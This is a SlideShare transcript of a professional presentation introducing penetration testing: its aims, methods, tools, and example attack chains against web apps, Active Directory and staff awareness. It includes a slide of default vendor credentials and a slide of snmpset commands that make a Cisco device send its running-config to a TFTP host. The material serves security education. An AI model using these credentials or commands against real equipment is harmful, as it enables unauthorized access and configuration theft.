• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Penetration testing, What’s this?
 

Penetration testing, What’s this?

on

  • 2,919 views

 

Statistics

Views

Total Views
2,919
Views on SlideShare
2,737
Embed Views
182

Actions

Likes
3
Downloads
198
Comments
0

6 Embeds 182

http://mangastorytelling.tistory.com 137
http://www.slideshare.net 38
http://search.daum.net 3
http://ptresearch.blogspot.com 2
http://facebook.slideshare.com 1
http://www.hanrss.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • Легенда: English alphabet characters in lower case, figures and special suymbols Other symbols

Penetration testing, What’s this? Penetration testing, What’s this? Presentation Transcript

  • Penetration testing What’s this? Dmitry Evteev ( Positive Technologies)
  • Penetration testing internals
    • Penetration testing != simulation of (un)real attacker activities
    • Penetration testing != instrumental scanning with manual vulnerability verification
    • Penetration testing –
      • is a complex of activities aimed to estimate current security process status;
      • is a testing of protection bypassing;
      • is one of security audit methods.
  • Methodology
    • On the one hand, the following best practices are used:
      • Open Source Security Testing Methodology Manual (OSSTMM)
      • Web Application Security Consortium (WASC)
      • Open Web Application Security Project (OWASP)
    • On the other hand, the following standards are used:
      • Center of Internet Security (CIS) guides
      • ISO 2700x series standards
  • Abilities Protection mechanism N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
  • Aims
    • High-level
      • Internal policy ( pentest as an instrument of pressure )
      • Estimation of current security processes
      • Should be done ( compliance )
    • Technological
      • Get unauthorized access to internal network from the Internet
      • Gain maximum privileges in main infrastructure systems ( Active Directory, network hardware , DBMS , ERP, etc. )
      • Get access to certain information resources
      • Get access to certain data ( information )
  • Approaches
    • Perimeter pentest ( with further attacks in internal network )
      • With or without administrator awareness
      • Wireless network security analysis
    • Internal pentest
      • From average user working station
      • From chosen network segment
    • Certain information system component testing ( security analysis )
      • Black, Grey and White Box
    • Assessment of employee awareness in information security
  • Real attack VS penetration testing
    • For direct executor pentset is HACKING !
    • Limitations
      • Compliance with Russian Federation legislation
      • Limited time
      • Minimum impact
      • No testing like DDoS
    • Inconveniences
      • Coordination of actions ( it can run into a very absurd extreme !)
      • Responsibility/Punctuality
    • Advantages
      • Do not need to hide the activities
      • Simplify the network perimeter identification process
      • A possibility to use Grey and White Box methods
  • Instruments
    • Positive Technologies MaxPatrol
    • Nmap/dnsenum/dig …
    • Immunity Canvas (VulnDisco, Agora Pack, Voip Pack)
    • Metasploit
    • THC Hydra/THC PPTP bruter/ncrack …
    • Cain and Abel/Wireshark
    • Aircrack
    • Yersinia
    • Browser , notepad …
  • web application security problem
      • The most frequent web application vulnerabilities detected by “Black Box” method ( 2009 statistics , http://ptsecurity.ru/analytics.asp )
  • Pentest example: web applications
    • What is web application pentest by BlackBox method? (real world)
    web server auditor working station Check 1 Check N Vulnerability is detected
    • Vulnerability 1: password bruteforce Impact: access to application ( with limited privileges )
    • Vulnerability 2: SQL injection Impact: file reading only (magic quotes option is enabled )
    Vulnerability is detected
    • Vulnerability 3: path traversal Impact: file reading only ( potentially LFI)
    • Vulnerability 4: predictable identifier of loaded file Vulnerability 3 + Vulnerability 4 = Impact: commands execution on server
    • Next step – FURTHER ATTACK
  • Weak password problem
    • The recommended password policy is used
    • What is domain administrator password?
    (coincide with login)
  • Pentest example: Password bruteforce ( defaults )
    • Well known
      • admin:123456
      • Administrator:P@ssw0rd
    • SAP
      • (DIAG) SAP*: 06071992, PASS
      • mandants : 000, 001, 066, all new
      • (RFC) SAPCPIC: ADMIN
      • mandants :000, 001, 066, all new
    • Oracle
      • sys:manager
      • sys:change_on_install
    • Cisco
      • Cisco:Cisco
  • Pentest example: Hello, Pavlik :)
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host>
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1
    • snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
  • The problem of access control
    • Network access
      • Network architecture ( DMZ , technological network , user segment , testing environment )
      • Remote network access
    • Data access
      • Shared resources ( password in clear text , data backup copy , different sensitive data )
      • Web applications , DBMS , ERP
  • The problem of access control
    • Division of privileges among administrators
    • Users with extended privileges
    • Services (!) with more than required access level
    • General problem of identifiers management
  • Pentest example: Use of vulnerabilities
    • CANVAS && Metasploit
  • Pentest example: Privilege Extension in Active Directory
    • Version 1 : Password bruteforce
    • Version 2 : Vulnerabilities in controller domain services
    • Version 3 : Pass-the-hash attack
    • Version 4: Create new user from domain computer
    • Version 5 : Conduct attack « Poisoning ARP cash » ( for example , hijack RDP session, lower authentication level to LM )
    • Version 6: NTLM Relay attack
    • Version 7: Find and restore system state domain ( for example , after successful attack on backup server )
    • Version 8 : Get extended privileges owing to other systems ( for example , control items in company’s root DNS )
    • Version 9 : Get extended privileges via other systems’ vulnerabilities ( passwords are stored with reversible encryption , insecure protocols are used, etc. )
    • Version N …
  • Pentest example: Security analysis
    • Network scanning
    • Password is bruteforced !
      • Exploitation of SQL Injection
      • Command execution on server
      • Privilege gaining
      • Internal resources attack
      • Internal pentest
      • Install MaxPatrol scanner
      • Find vulnerabilities
      • Exploit vulnerabilities
      • Move to network of the Head office
      • Conduct attacks on Head office resources
      • Get maximum privileges in the whole network !
  • Pentest example: Security analysis
  • Pentest example: Wireless networks
  • Pentest example: Assessment of awareness program efficiency
    • Send provocative messages via e-mail
    • Send provocative messages via ICQ ( and other IM)
    • Distribute data media with provocative messages
    • Question employees
    • Talks ( by telephone , skype )
  • Pentest example: Example of a set of checks Note description Attack Monitored events A note from authority with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from internal person with link to web site . The link points to an executable file . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb server . Execute the file . A note from authority with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
  • Pentest example: Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
  • Conclusions
    • Penetration testing
    • – is a number of activities that allows to make efficient assessment of current security processes
    • Penetration testing
    • – is search and use of flows in security processes
      • vulnerability management
      • configuration management
      • incident management
      • security management of web applications, DBMS , ERP, wire and wireless networks, etc.
      • etc.
  • Thank you for your attention ! Any questions? [email_address] http://devteev.blogspot.com/